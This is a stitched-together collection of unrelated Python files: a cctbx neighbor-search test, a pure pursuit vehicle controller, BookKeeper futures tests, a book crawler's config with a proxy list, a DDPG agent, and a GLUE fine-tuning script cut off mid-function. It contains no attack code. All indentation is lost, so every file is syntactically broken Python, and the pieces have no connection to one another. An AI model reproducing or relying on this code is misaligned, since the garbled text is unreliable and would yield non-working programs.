# more tests in cctbx/crystal/tst_ext.py, exercise_cubicles_max_memory()
def neighbors_simple(main_sites_cart, other_sites_cart, distance_cutoff_sq):
from scitbx.matrix import col
result = {}
for j,sj in enumerate(other_sites_cart):
vj = col(sj)
for i,si in enumerate(main_sites_cart):
vi = col(si)
if ((vj-vi).length_sq() <= distance_cutoff_sq):
result.setdefault(j, []).append(i)
return result
def run(args):
assert len(args) == 0
exercise_cubicles_max_memory()
from scitbx.cubicle_neighbors import cubicle_neighbors
from scitbx.array_family import flex
main_sites_cart = flex.vec3_double()
cn = cubicle_neighbors(main_sites_cart=main_sites_cart, cubicle_edge=5)
nb = cn.neighbors_of(other_sites_cart=main_sites_cart, distance_cutoff_sq=1)
assert nb.size() == 0
for xyz in [(0,0,0), (0.1, 0.2, -0.3)]:
main_sites_cart = flex.vec3_double([xyz])
cn = cubicle_neighbors(main_sites_cart=main_sites_cart, cubicle_edge=5)
nb = cn.neighbors_of(other_sites_cart=main_sites_cart, distance_cutoff_sq=1)
assert nb.size() == 1
assert nb.keys() == [0]
assert list(nb[0]) == [0]
nb = cn.neighbors_of(
other_sites_cart=flex.vec3_double([(2,2,2)]), distance_cutoff_sq=1)
assert nb.size() == 0
nb = cn.neighbors_of(
other_sites_cart=flex.vec3_double([(2,2,2)]), distance_cutoff_sq=25)
assert nb.size() == 1
mt = flex.mersenne_twister(seed=0)
for nm in [3,5,8]:
for no in [1,7,9]:
main_sites_cart = flex.vec3_double(list(zip(
mt.random_double(size=nm)*2-1,
mt.random_double(size=nm)*2-1,
mt.random_double(size=nm)*2-1)))
other_sites_cart = flex.vec3_double(list(zip(
mt.random_double(size=no)*2-1,
mt.random_double(size=no)*2-1,
mt.random_double(size=no)*2-1)))
for distance_cutoff in [0.5, 1]:
distance_cutoff_sq = distance_cutoff**2
cn = cubicle_neighbors(main_sites_cart=main_sites_cart, cubicle_edge=1)
nb = cn.neighbors_of(
other_sites_cart=other_sites_cart,
distance_cutoff_sq=distance_cutoff_sq)
nb_simple = neighbors_simple(
main_sites_cart=main_sites_cart,
other_sites_cart=other_sites_cart,
distance_cutoff_sq=distance_cutoff_sq)
assert sorted(nb.keys()) == sorted(nb_simple.keys())
for j_seq,i_seqs_simple in nb_simple.items():
i_seqs = nb[j_seq]
assert sorted(i_seqs) == sorted(i_seqs_simple)
print("OK")
if (__name__ == "__main__"):
import sys
run(args=sys.argv[1:])
|
<filename>Linux/PurePursuit/pure_pursuit.py
#!/usr/bin/env python
# ======================================================
# Copyright (C) 2020 repa1030
# This program and the accompanying materials
# are made available under the terms of the MIT license.
# ======================================================
'''
Core calculation of pure pursuit algorithm
The algorithm calculates a circle through the
current position of the car and the next waypoint.
This returns a curvature which can be converted to the
single track steering model.
'''
import math
import numpy as np
class PurePursuit:
# initialization of instance of pure pursuit
def __init__(self, cmd_velo, vehicle_mass, wheel_rad, motor_torque,
brake_torque, wheel_base, offset):
self.next_wp = np.zeros(3) # [x1, y1, z1], z1 is not used
self.current_pos = np.zeros(3) # [x0, y0, z0], z0 is not used
self.max_radius = 9e10 # max radius of steering
self.wheel_base = wheel_base # wheel base [m], used for Ackermann
self.offset = offset # offset from vehicle to clipping plane
self.wp_velocity = cmd_velo * 1000.0 / (60.0 * 60.0)
self.max_accel = motor_torque / wheel_rad / vehicle_mass
self.max_decel = brake_torque / wheel_rad / vehicle_mass
self.gas = 0.0 # init
self.brake = 0.0 # init
self.steer = 0.0 # init
# this converts the curvature to a steering angle
def convertToAckermann(self, kappa):
return -math.atan(self.wheel_base * kappa)
# this can be used to set the current pose
def updatePos(self, pose):
self.current_pose = pose
# this can be used to set the new waypoint
def updateWp(self, wp):
self.next_wp[0] = wp[0] + self.offset
self.next_wp[1] = wp[1]
self.next_wp[2] = wp[2]
# this calculates the curvature (pure pursuit algorithm)
def calcCurvature(self, dist, y):
if y == 0 or dist == 0:
curvature = 1 / self.max_radius
else:
curvature = 2 * y / dist / dist
if abs(curvature) < 1 / self.max_radius:
curvature = 1 / self.max_radius
return curvature
# this calculates the current distance from pose to waypoint
def calcDistance(self):
x = self.next_wp[0] - self.current_pos[0]
y = self.next_wp[1] - self.current_pos[1]
dst = math.sqrt(x*x + y*y)
return dst, y
# this is the pipeline for calculating the steering angle
# make sure, that current pose and waypoint is set before
# calling this function
def calcSteeringAngle(self):
(dst, y) = self.calcDistance()
kappa = self.calcCurvature(dst, y)
self.steer = self.convertToAckermann(kappa)
return dst
# this calculates the gas and brake pedal positions
# based on current velocity and dyn_thresh parameter
# a threshold is calculated and compared to
# v^2 - v0^2 = 2ax => a = (v^2 - v0^2) / (2x)
# based on the result, the vehicle accelerates or brakes
def calcPedalPositions(self, current_velo, dst):
a = (self.wp_velocity * self.wp_velocity - current_velo * current_velo) / (2.0 * dst)
if (a < 0.0):
# brake
self.gas = 0.0
self.brake = abs(a / self.max_decel)
if self.brake > 1.0:
self.brake = 1.0
else:
# accelerate
self.gas = abs(a / self.max_accel)
self.brake = 0.0
if self.gas > 1.0:
self.gas = 1.0
# use this function to calculate control commands
def calcControlCommands(self, current_velo, waypoint):
self.updateWp(waypoint)
dst = self.calcSteeringAngle()
self.calcPedalPositions(current_velo, dst)
return (round(self.steer, 4), round(self.brake, 4), round(self.gas, 4))
|
<filename>stream/clients/python/tests/unit/bookkeeper/test_futures.py
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
import mock
import pytest
from bookkeeper.kv import futures, exceptions
def _future(*args, **kwargs):
return futures.Future(*args, **kwargs)
def test_constructor_defaults():
with mock.patch.object(threading, 'Event', autospec=True) as Event:
future = _future()
assert future._result == futures.Future._SENTINEL
assert future._exception == futures.Future._SENTINEL
assert future._callbacks == []
assert future._completed is Event.return_value
Event.assert_called_once_with()
def test_constructor_explicit_completed():
completed = mock.sentinel.completed
future = _future(completed=completed)
assert future._result == futures.Future._SENTINEL
assert future._exception == futures.Future._SENTINEL
assert future._callbacks == []
assert future._completed is completed
def test_cancel():
assert _future().cancel() is False
def test_cancelled():
assert _future().cancelled() is False
def test_running():
future = _future()
assert future.running() is True
future.set_result('foobar')
assert future.running() is False
def test_done():
future = _future()
assert future.done() is False
future.set_result('12345')
assert future.done() is True
def test_exception_no_error():
future = _future()
future.set_result('12345')
assert future.exception() is None
def test_exception_with_error():
future = _future()
error = RuntimeError('Something really bad happened.')
future.set_exception(error)
# Make sure that the exception that is returned is the batch's error.
# Also check the type to ensure the batch's error did not somehow
# change internally.
assert future.exception() is error
assert isinstance(future.exception(), RuntimeError)
with pytest.raises(RuntimeError):
future.result()
def test_exception_timeout():
future = _future()
with pytest.raises(exceptions.TimeoutError):
future.exception(timeout=0.01)
def test_result_no_error():
future = _future()
future.set_result('42')
assert future.result() == '42'
def test_result_with_error():
future = _future()
future.set_exception(RuntimeError('Something really bad happened.'))
with pytest.raises(RuntimeError):
future.result()
def test_add_done_callback_pending_batch():
future = _future()
callback = mock.Mock()
future.add_done_callback(callback)
assert len(future._callbacks) == 1
assert callback in future._callbacks
assert callback.call_count == 0
def test_add_done_callback_completed_batch():
future = _future()
future.set_result('12345')
callback = mock.Mock(spec=())
future.add_done_callback(callback)
callback.assert_called_once_with(future)
def test_trigger():
future = _future()
callback = mock.Mock(spec=())
future.add_done_callback(callback)
assert callback.call_count == 0
future.set_result('12345')
callback.assert_called_once_with(future)
def test_set_result_once_only():
future = _future()
future.set_result('12345')
with pytest.raises(RuntimeError):
future.set_result('67890')
def test_set_exception_once_only():
future = _future()
future.set_exception(ValueError('wah wah'))
with pytest.raises(RuntimeError):
future.set_exception(TypeError('other wah wah'))
|
<reponame>ourcolour/sobookscrawler
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
+-------------------------------------------------
@Author: cc
@Contact: <EMAIL>
@Site: http://www.xjh.com
@Project: sobookscrawler
@File: configs.py
@Version:
@Time: 2019/5/24 12:21
@Description: TO-DO
+-------------------------------------------------
@Change Activity:
1. Created at 2019/5/24 12:21
2. TO-DO
+-------------------------------------------------
'''
__author__ = 'cc'
import os.path
import platform
import random
import sys
import mongoengine as me
from utils import path_util
'''
Http Proxy
'''
rnd = random.Random()
HTTPS_PROXY_LIST = [
# '172.16.58.3:9999',
# '172.16.31.10:9999',
# '192.168.3.11:4204',
'172.16.31.10:4274',
# '172.16.58.3:4276',
# '172.16.31.10:5946',
# '192.168.3.11:2549',
'172.16.31.10:4230',
'192.168.3.11:4205',
'172.16.58.3:1246',
'192.168.127.12:5946',
'172.16.58.3:4212',
]
def RANDOM_PROXY(return_tuple=True):
idx = rnd.randint(0, len(HTTPS_PROXY_LIST) - 1)
result = HTTPS_PROXY_LIST[idx]
if return_tuple:
arr = result.split(':')
return arr[0], int(arr[1])
else:
return result
'''
MongoDB
'''
MONGO_HOST = 'mongodb://127.0.0.1:27017' # '192.168.2.91'
# MONGO_HOST = 'mongodb://mongo01.dev.xjh.com:27017,mongo02.dev.xjh.com:27017,mongo03.dev.xjh.com:27017/?replicaSet=xjh'
MONGO_PORT = 27017
MONGO_CONNECTION_NAME = me.DEFAULT_CONNECTION_NAME
MONGO_DATABASE = 'DoubanBookApi'
# MONGO_COLLECTION = 'cloud_storage'
# MONGO_COLLECTION = 'download_task'
'''
Selenium Configurations
'''
TASK_WAIT_TIMEOUT = 3 * 1000
MAX_THREAD_COUNT = 1
FIREFOX_BINARY_PATH = '/Applications/Firefox.app/Contents/MacOS/firefox'
if 'windows' == platform.system().lower():
GECKO_EXECUTABLE_PATH = os.path.join(os.path.dirname(sys.argv[0]), 'thirdparty', 'geckodriver.exe')
else:
GECKO_EXECUTABLE_PATH = os.path.join(os.path.dirname(sys.argv[0]), 'thirdparty', 'geckodriver')
# print('Geckodriver: {}'.format(GECKO_EXECUTABLE_PATH))
BROWSER_HEADLESS_MODE = False
'''
App Configs
'''
APP_BIN_PATH = os.path.join(path_util.get_app_path(), '..', 'bin')
SCREEN_SHOT_PATH = os.path.join(APP_BIN_PATH, 'screen-shot')
# ----------------------------------
# Use local config file `app-configs.json` (= True)
# or
# load settings from AliACM service. ( =False)
# ----------------------------------
USE_LOCAL_APP_CONFIGS = True
APP_ENV = 'prd'
# 1. If use local file:
APP_CONFIG_PATH = os.path.join(APP_BIN_PATH, 'app-config.json')
# 2. If use AliACM:
ACM_SNAPSHOT_DIR = os.path.join(APP_BIN_PATH, 'acm-snapshot')
ACM_ENDPOINT = 'acm.aliyun.com'
# --- AliACM Access Token BEGIN ---
ACM_NAMESPACE = 'Leave your namespace here.'
ACM_ACCESS_KEY = 'Leave your access key here.'
ACM_SECRET_KEY = 'Leave your secret key.'
# --- AliACM Access Token END ---
'''
Validate Code
'''
SOBOOKS_VALIDATE_CODE = '512512'
# ----------
# DO NOT MODIFY THE INFOMATIONS BELOW
# ----------
BAIDU_COOKIE_PATH = os.path.join(APP_BIN_PATH, 'baidu-config.json')
DOUBAN_COOKIE_PATH = os.path.join(APP_BIN_PATH, 'douban-config.json')
|
<filename>ddpg_agent.py
import torch
import torch.optim as opt
from torch.autograd import Variable
from torch import FloatTensor as FT
import agent
from replay_buffer import ExperienceReplay
import numpy as np
from torch.utils.serialization import load_lua
import importlib.util
# import model_defs.ddpg_models.mountain_cart.actor as actor
# import model_defs.ddpg_models.mountain_cart.critic as critic
import random
#Default hyperparameter values
REPLAY_BUFFER_SIZE = 1000000
DISCOUNT_FACTOR = 1
LEARNING_RATE_CRITIC = 0.01
LEARNING_RATE_ACTOR = 0.01
ACTOR_ITER_COUNT = 1000
CRITIC_ITER_COUNT = 1000
BATCH_SIZE = 100
EPSILON = 0.01
FREEZE_TARGET_STEPS = 1
class DDPGAgent(agent.Agent):
"""An agent that implements the DDPG algorithm
An agent that implements the deep deterministic
policy gradient algorithm for continuous control.
A description of the algorithm can be found at
https://arxiv.org/pdf/1509.02971.pdf.
The agent stores a replay buffer along with
two models of the data, an actor and a critic.
Attributes:
auxiliary_losses: The list of enabled
auxiliary rewards for this agent
actor: The actor model that takes a state
and returns a new action.
critic: The critic model that takes a state
and an action and returns the expected
reward
replay_buffer: The DDPGAgent replay buffer
"""
"""
@property
def actor(self):
return self.actor
@property
def critic(self):
return self.critic
@property
def replay_buffer(self):
return self.replay_buffer
"""
def __init__(self,
model_def,
state_size = 1,
action_size = 1,
buffer_size = REPLAY_BUFFER_SIZE,
gamma = DISCOUNT_FACTOR,
actor_alpha = LEARNING_RATE_ACTOR,
critic_alpha = LEARNING_RATE_CRITIC,
actor_iter_count = ACTOR_ITER_COUNT,
critic_iter_count = CRITIC_ITER_COUNT,
freeze_target_steps = FREEZE_TARGET_STEPS,
batch_size = BATCH_SIZE,
use_cuda = True):
"""Constructor for the DDPG_agent
Args:
buffer_size: size of the replay buffer
alpha: The learning rate
gamma: The discount factor
Returns:
A DDPGAgent object
"""
self._use_cuda = use_cuda
#Initialize experience replay buffer
self.replay_buffer = ExperienceReplay(state_size, action_size, buffer_size)
#TODO
#initialize parameters
self.epsilon = 0.35
self._actor_alpha = actor_alpha
self._critic_alpha = critic_alpha
self._actor_iter_count = actor_iter_count
self._critic_iter_count = critic_iter_count
self._freeze_target_steps = freeze_target_steps
self._freeze_target_step = 0
self._gamma = gamma
self._batch_size = batch_size
self._state_size = state_size
self._action_size = action_size
# import the specified model_defs
spec = importlib.util.spec_from_file_location("model_def", model_def)
ModelDefModule = importlib.util.module_from_spec(spec)
spec.loader.exec_module(ModelDefModule)
self.ActorModuleClass = ModelDefModule.Actor
self.CriticModuleClass = ModelDefModule.Critic
#initialize models
self.load_models()
#Move weights and bufffers to the gpu if possible
if self._use_cuda:
self.actor = self.actor.cuda()
self.critic = self.critic.cuda()
self._target_critic = self._target_critic.cuda()
#Initialize optimizers
self._actor_optimizer = opt.Adam(self.actor.parameters(), lr=self._actor_alpha)
self._critic_optimizer = opt.Adam(self.critic.parameters(), lr=self._critic_alpha)
# if self._use_cuda:
# self._actor_optimizer = self._actor_optimizer.cuda()
# self._critic_optimizer = self._critic_optimizer.cuda()
def train(self):
"""Trains the agent for a bit.
Args:
None
Returns:
None
"""
self.epsilon = self.epsilon * 0.99995
#update_critic
for i in range(self._critic_iter_count):
s_t, a_t, r_t, s_t1, done = self.replay_buffer.batch_sample(self._batch_size)
done = self.upcast(done)
s_t = self.upcast(s_t)
a_t = self.upcast(a_t)
s_t1 = self.upcast(s_t1)
r_t = self.upcast(r_t)
a_t1 = self.actor.forward(s_t1)
critic_target = r_t + self._gamma*(1-done)*self._target_critic.forward(s_t1,a_t1)
td_error = (self.critic.forward(s_t,a_t)-critic_target)**2
#preform one optimization update
self._critic_optimizer.zero_grad()
mean_td_error = torch.mean(td_error)
mean_td_error.backward()
self._critic_optimizer.step()
#update_actor
for i in range(self._actor_iter_count):
s_t, a_t, r_t, s_t1, done = self.replay_buffer.batch_sample(self._batch_size)
done = self.upcast(done)
s_t = self.upcast(s_t)
a_t = self.upcast(a_t)
s_t1 = self.upcast(s_t1)
r_t = self.upcast(r_t)
a_t1 = self.actor.forward(s_t1)
expected_reward = self.critic.forward(s_t1,a_t1)
total_loss = -1*expected_reward
mean_loss = torch.mean(total_loss)
#print('LOSS:', mean_loss, 'Eps', self.epsilon)
#preform one optimization update
self._actor_optimizer.zero_grad()
mean_loss.backward()
self._actor_optimizer.step()
# TODO: Freeze less often
self._freeze_target_step += 1
if (self._freeze_target_step >= self._freeze_target_steps):
self._target_critic.load_state_dict(self.critic.state_dict())
self._freeze_target_step = 0
def get_next_action(self,
cur_state,
agent_id=None,
is_test=False):
"""Get the next action from the agent.
Takes a state,reward and possibly auxiliary reward
tuple and returns the next action from the agent.
The agent may cache the reward and state
Args:
cur_state: The current state of the enviroment
prev_reward: The previous reward from the enviroment
is_done: Signals if a given episode is done.
is_test: Check to see if the agent is done
agent_id=None
Returns:
The next action that the agent with the given
agent_id will carry out given the current state
"""
cur_action = None
cur_state_up = self.upcast(np.expand_dims(cur_state,axis=0))
if is_test:
a = self.actor.forward(cur_state_up)
cur_action = a.data.cpu().numpy()
elif random.random() < self.epsilon:
a = self.actor.forward(cur_state_up)
cur_action = a.data.cpu().numpy()
cur_action += 0.3*np.expand_dims(np.random.randn(self._action_size),axis=0)
self.replay_buffer.put_act(cur_state,cur_action)
else:
a = self.actor.forward(cur_state_up)
cur_action = a.data.cpu().numpy()
self.replay_buffer.put_act(cur_state,cur_action)
return cur_action
def log_reward(self,reward,is_done):
self.replay_buffer.put_rew(reward,is_done)
def save_models(self, location=None):
"""Save the model to a given location
Args:
Location: where to save the model
Returns:
None
"""
#Return all weights and buffers to the cpu
self.actor.cpu()
self.critic.cpu()
weight_dict = {'actor': self.actor.state_dict(), 'critic': self.critic.state_dict()}
#Save both models
torch.save(weight_dict, location)
#Move weights and bufffers to the gpu if possible
if self._use_cuda:
self.actor = self.actor.cuda()
self.critic = self.critic.cuda()
self._target_critic = self._target_critic.cuda()
def load_models(self, location=None):
# TODO: Make it actually do what it says
#TODO: Remove hard coding of data
"""Loads the models from given location
Args:
Location: from where to load the model
Returns:
None
"""
self.actor = self.ActorModuleClass(self._state_size,self._action_size) #dill.load(actor_file)
self.critic = self.CriticModuleClass(self._state_size + self._action_size, 1)#dill.load(critic_file)
self._target_critic = self.CriticModuleClass(self._state_size + self._action_size,1)#dill.load(critic_file)
if location is not None:
weight_dict = torch.load(location)
self.actor.load_state_dict(weight_dict['actor'])
self.critic.load_state_dict(weight_dict['critic'])
def upcast(self, x):
''' Upcasts x to a torch Variable.
'''
#TODO: Where does this go?
if self._use_cuda:
return Variable(FT(x.astype(np.float32))).cuda()
else:
return Variable(FT(x.astype(np.float32)))
|
# coding=utf-8
# Copyright 2020 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Finetuning the library models for sequence classification on GLUE."""
# You can also adapt this script on your own text classification task. Pointers for this are left as comments.
import logging
import os
import random
import sys
from dataclasses import dataclass, field
from typing import Optional
import itertools
import collections
import tensorflow as tf
import datetime
import numpy as np
import datasets as hf_datasets
from datasets import load_dataset, load_metric
import transformers
from transformers import (
AutoConfig,
AutoModelForSequenceClassification,
AutoTokenizer,
GPT2Tokenizer,
GPT2Config,
GPT2ForSequenceClassification,
EvalPrediction,
HfArgumentParser,
PretrainedConfig,
Trainer,
TrainingArguments,
default_data_collator,
set_seed,
)
# from transformers.trainer_utils import is_main_process
# import pyarrow.csv
from datasets import Features, ClassLabel, Value
task_to_keys = {
"cls": ("sentence", None),
"pawsx": ("sentence1", "sentence2"),
"xnli": ("premise", "hypothesis"),
"wsd": ("sentence", None),
}
task_to_metrics = {
"cls": "sst2",
"pawsx": "mrpc",
"xnli": "mnli",
"wsd": "",
}
DevResult = collections.namedtuple('DevResult', 'seed, learning_rate batch_size eval_metric_1 eval_metric_2 eval_loss')
logger = logging.getLogger(__name__)
@dataclass
class DataTrainingArguments:
"""
Arguments pertaining to what data we are going to input our model for training and eval.
Using `HfArgumentParser` we can turn this class
into argparse arguments to be able to specify them on
the command line.
"""
task_name: Optional[str] = field(
default=None,
metadata={"help": "The name of the task to train on: " + ", ".join(task_to_keys.keys())},
)
n_seeds: Optional[int] = field(
default=5,
metadata={"help": "Number of run for task with small training sets."},
)
max_seq_length: int = field(
default=128,
metadata={
"help": "The maximum total input sequence length after tokenization. Sequences longer "
"than this will be truncated, sequences shorter will be padded."
},
)
overwrite_cache: bool = field(
default=False, metadata={"help": "Overwrite the cached preprocessed datasets or not."}
)
pad_to_max_length: bool = field(
default=True,
metadata={
"help": "Whether to pad all samples to `max_seq_length`. "
"If False, will pad the samples dynamically when batching to the maximum length in the batch."
},
)
train_file: Optional[str] = field(
default=None, metadata={"help": "A csv or a json file containing the training data."}
)
validation_file: Optional[str] = field(
default=None, metadata={"help": "A csv or a json file containing the validation data."}
)
predict_file: Optional[str] = field(
default=None, metadata={"help": "A csv or a json file containing the test data."}
)
learning_rates: Optional[str] = field(
default=None, metadata={"help": "A csv or a json file containing the test data."}
)
batch_sizes: Optional[str] = field(
default=None, metadata={"help": "A csv or a json file containing the test data."}
)
def __post_init__(self):
if self.task_name is not None:
self.task_name = self.task_name.lower()
if self.task_name not in task_to_keys.keys():
raise ValueError("Unknown task, you should pick one in " + ",".join(task_to_keys.keys()))
elif self.train_file is None or self.validation_file is None:
raise ValueError("Need either a GLUE task or a training/validation file.")
else:
extension = self.train_file.split(".")[-1]
assert extension in ["csv", "json"], "`train_file` should be a csv or a json file."
extension = self.validation_file.split(".")[-1]
assert extension in ["csv", "json"], "`validation_file` should be a csv or a json file."
@dataclass
class ModelArguments:
"""
Arguments pertaining to which model/config/tokenizer we are going to fine-tune from.
"""
model_name_or_path: str = field(
metadata={"help": "Path to pretrained model or model identifier from huggingface.co/models"}
)
config_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"}
)
tokenizer_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained tokenizer name or path if not the same as model_name"}
)
cache_dir: Optional[str] = field(
default=None,
metadata={"help": "Where do you want to store the pretrained models downloaded from huggingface.co"},
)
use_fast_tokenizer: bool = field(
default=True,
metadata={"help": "Whether to use one of the fast tokenizer (backed by the tokenizers library) or not."},
)
def main():
# See all possible arguments in src/transformers/training_args.py
# or by passing the --help flag to this script.
# We now keep distinct sets of args, for a cleaner separation of concerns.
parser = HfArgumentParser((ModelArguments, DataTrainingArguments, TrainingArguments))
if len(sys.argv) == 2 and sys.argv[1].endswith(".json"):
# If we pass only one argument to the script and it's the path to a json file,
# let's parse it to get our arguments.
model_args, data_args, training_args = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1]))
else:
model_args, data_args, training_args = parser.parse_args_into_dataclasses()
# Setup logging
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
level=logging.INFO if True else logging.WARN, # is_main_process(training_args.local_rank)
)
# Log on each process the small summary:
logger.warning(
f"Process rank: {training_args.local_rank}, device: {training_args.device}, n_gpu: {training_args.n_gpu}"
+ f"distributed training: {bool(training_args.local_rank != -1)}, 16-bits training: {training_args.fp16}"
)
# Set the verbosity to info of the Transformers logger (on main process only):
if True: # is_main_process(training_args.local_rank)
transformers.utils.logging.set_verbosity_info()
transformers.utils.logging.enable_default_handler()
# transformers.utils.logging.enable_explicit_format()
logger.info(f"Training/evaluation parameters {training_args}")
hyper_parameters_gridsearch = {
'learning_rate': [float(lr) for lr in data_args.learning_rates.split('/')],
'batch_size': [float(lr) for lr in data_args.batch_sizes.split('/')],
}
hyper_parameters_values = [p for p in itertools.product(*[*hyper_parameters_gridsearch.values()])]
# Set seed before initializing model.
# set_seed(training_args.seed)
if data_args.task_name in ['pawsx', 'xnli', 'wsd']:
n_seeds_ = 1
else:
n_seeds_ = data_args.n_seeds
eval_results = {}
test_results = {}
for hyperparameters in hyper_parameters_values:
for seed in range(n_seeds_):
training_args.learning_rate = hyperparameters[0]
training_args.per_device_train_batch_size = int(hyperparameters[1])
print('\nstart hyper-parameters search with : lr: {} and batch_size: {} without seed {}'.format(
training_args.learning_rate, training_args.per_device_train_batch_size, seed))
def split_sentences(example):
example['sentence2'] = example['sentence1'].split('\t')[1]
example['sentence1'] = example['sentence1'].split('\t')[0]
return example
def cast_labels(example):
example['premise'] = example['premise'].strip('\"')
example['label'] = example['hypothesis']
example['hypothesis'] = example['premise'].split('\t')[1]
example['premise'] = example['premise'].split('\t')[0]
if example['label'] == "entailment":
example['label'] = 0
elif example['label'] == "neutral":
example['label'] = 1
elif example['label'] == "contradiction":
example['label'] = 2
return example
if data_args.task_name == "pawsx":
datasets = load_dataset("csv", data_files={"train": data_args.train_file,
"validation": data_args.validation_file,
"test": data_args.predict_file},
column_names=['label', 'idx1', 'idx2', 'sentence1', 'sentence2'],
skiprows=0, sep='\t')
# datasets = hf_datasets.load_from_disk(data_args.train_file)
datasets = datasets.map(split_sentences)
datasets.cast_(Features({'label': ClassLabel(num_classes=2),
'idx1': Value(dtype='int64'),
'idx2': Value(dtype='int64'),
'sentence1': Value(dtype='string'),
'sentence2': Value(dtype='string'),
}))
elif data_args.task_name == "xnli":
datasets = load_dataset("csv", data_files={"train": data_args.train_file,
"validation": data_args.validation_file,
"test": data_args.predict_file},
column_names=['premise', 'hypothesis', 'label'], skiprows=1, sep='\t')
# datasets = hf_datasets.load_from_disk(data_args.train_file)
datasets = datasets.map(cast_labels)
datasets.cast_(Features({'premise': Value(dtype='string'),
'hypothesis': Value(dtype='string'),
'label': ClassLabel(names=['entailment', 'neutral', 'contradiction']),
}))
elif data_args.task_name == "cls":
datasets = load_dataset("csv", data_files={"train": data_args.train_file,
"validation": data_args.validation_file,
"test": data_args.predict_file},
column_names=['sentence', 'label'], skiprows=1, sep='\t')
# datasets = hf_datasets.load_from_disk(data_args.train_file)
datasets.cast_(Features({'sentence': Value(dtype='string'),
'label': ClassLabel(num_classes=2),
}))
# Labels
if data_args.task_name is not None:
is_regression = data_args.task_name == "stsb"
if not is_regression:
label_list = datasets["train"].features["label"].names
num_labels = len(label_list)
else:
num_labels = 1
else:
# Trying to have good defaults here, don't hesitate to tweak to your needs.
is_regression = datasets["train"].features["label"].dtype in ["float32", "float64"]
if is_regression:
num_labels = 1
else:
# A useful fast method:
# https://huggingface.co/docs/datasets/package_reference/main_classes.html#datasets.Dataset.unique
label_list = datasets["train"].unique("label")
label_list.sort() # Let's sort it for determinism
num_labels = len(label_list)
# Load pretrained model and tokenizer
#
# In distributed training, the .from_pretrained methods guarantee that only one local process can concurrently
# download model & vocab.
config = AutoConfig.from_pretrained(
model_args.config_name if model_args.config_name else model_args.model_name_or_path,
num_labels=num_labels,
finetuning_task=task_to_metrics[data_args.task_name],
output_attention=False,
output_hidden_states=False,
use_cache=False
# cache_dir=model_args.cache_dir,
)
tokenizer = GPT2Tokenizer.from_pretrained(
model_args.tokenizer_name if model_args.tokenizer_name else model_args.model_name_or_path,
cache_dir=model_args.cache_dir,
use_fast=model_args.use_fast_tokenizer,
)
# if tokenizer.__class__.__name__ == 'GPT2TokenizerFast':
tokenizer.add_special_tokens({
"eos_token": "</s>",
"bos_token": "<s>",
"unk_token": "<unk>",
"pad_token": "<pad>",
"mask_token": "<mask>"
})
# config = GPT2Config(
# vocab_size=tokenizer.vocab_size,
# bos_token_id=tokenizer.bos_token_id,
# eos_token_id=tokenizer.bos_token_id,
# n_embd=120, # 1200, 1536
# n_layer=1, # 36, 40
# n_head=3, # 12, 16
# output_attentions=False,
# output_hidden_states=False,
# use_cache=False,
# num_labels=num_labels,
# finetuning_task=task_to_metrics[data_args.task_name],
# )
config.pad_token_id = tokenizer.pad_token_id
# model = GPT2ForSequenceClassification(config)
model = GPT2ForSequenceClassification.from_pretrained( # AutoModelForSequenceClassification
model_args.model_name_or_path,
from_tf=bool(".ckpt" in model_args.model_name_or_path),
config=config,
# cache_dir=model_args.cache_dir,
)
model.train()
# Preprocessing the datasets
if data_args.task_name is not None:
sentence1_key, sentence2_key = task_to_keys[data_args.task_name]
else:
# Again, we try to have some nice defaults but don't hesitate to tweak to your use case.
non_label_column_names = [name for name in datasets["train"].column_names if name != "label"]
if "sentence1" in non_label_column_names and "sentence2" in non_label_column_names:
sentence1_key, sentence2_key = "sentence1", "sentence2"
else:
if len(non_label_column_names) >= 2:
sentence1_key, sentence2_key = non_label_column_names[:2]
else:
sentence1_key, sentence2_key = non_label_column_names[0], None
# Padding strategy
if data_args.pad_to_max_length:
padding = "max_length"
max_length = data_args.max_seq_length
else:
# We will pad later, dynamically at batch creation, to the max sequence length in each batch
padding = False
max_length = None
# Some models have set the order of the labels to use, so let's make sure we do use it.
label_to_id = None
if (
model.config.label2id != PretrainedConfig(num_labels=num_labels).label2id
and data_args.task_name is not None
and is_regression
):
# Some have all caps in their config, some don't.
label_name_to_id = {k.lower(): v for k, v in model.config.label2id.items()}
if list(sorted(label_name_to_id.keys())) == list(sorted(label_list)):
label_to_id = {i: label_name_to_id[label_list[i]] for i in range(num_labels)}
else:
logger.warn(
"Your model seems to have been trained with labels, but they don't match the dataset: ",
f"model labels: {list(sorted(label_name_to_id.keys()))}, dataset labels: {list(sorted(label_list))}."
"\nIgnoring the model labels as a result.",
)
elif data_args.task_name is None:
label_to_id = {v: i for i, v in enumerate(label_list)}
def preprocess_function(examples):
# Tokenize the texts
args = (
(examples[sentence1_key],) if sentence2_key is None else (
examples[sentence1_key], examples[sentence2_key])
) # examples[sentence2_key]
result = tokenizer(*args, padding=padding, max_length=max_length, truncation=True)
# Map labels to IDs (not necessary for GLUE tasks)
if label_to_id is not None and "label" in examples:
result["label"] = [label_to_id[l] for l in examples["label"]]
return result
datasets = datasets.map(preprocess_function, batched=True,
load_from_cache_file=not data_args.overwrite_cache)
train_dataset = datasets["train"]
eval_dataset = datasets["validation_matched" if data_args.task_name == "mnli" else "validation"]
if data_args.task_name is not None:
test_dataset = datasets["test_matched" if data_args.task_name == "mnli" else "test"]
# Log a few random samples from the training set:
for index in random.sample(range(len(train_dataset)), 3):
logger.info(f"Sample {index} of the training set: {train_dataset[index]}.")
# Get the metric function
if data_args.task_name is not None:
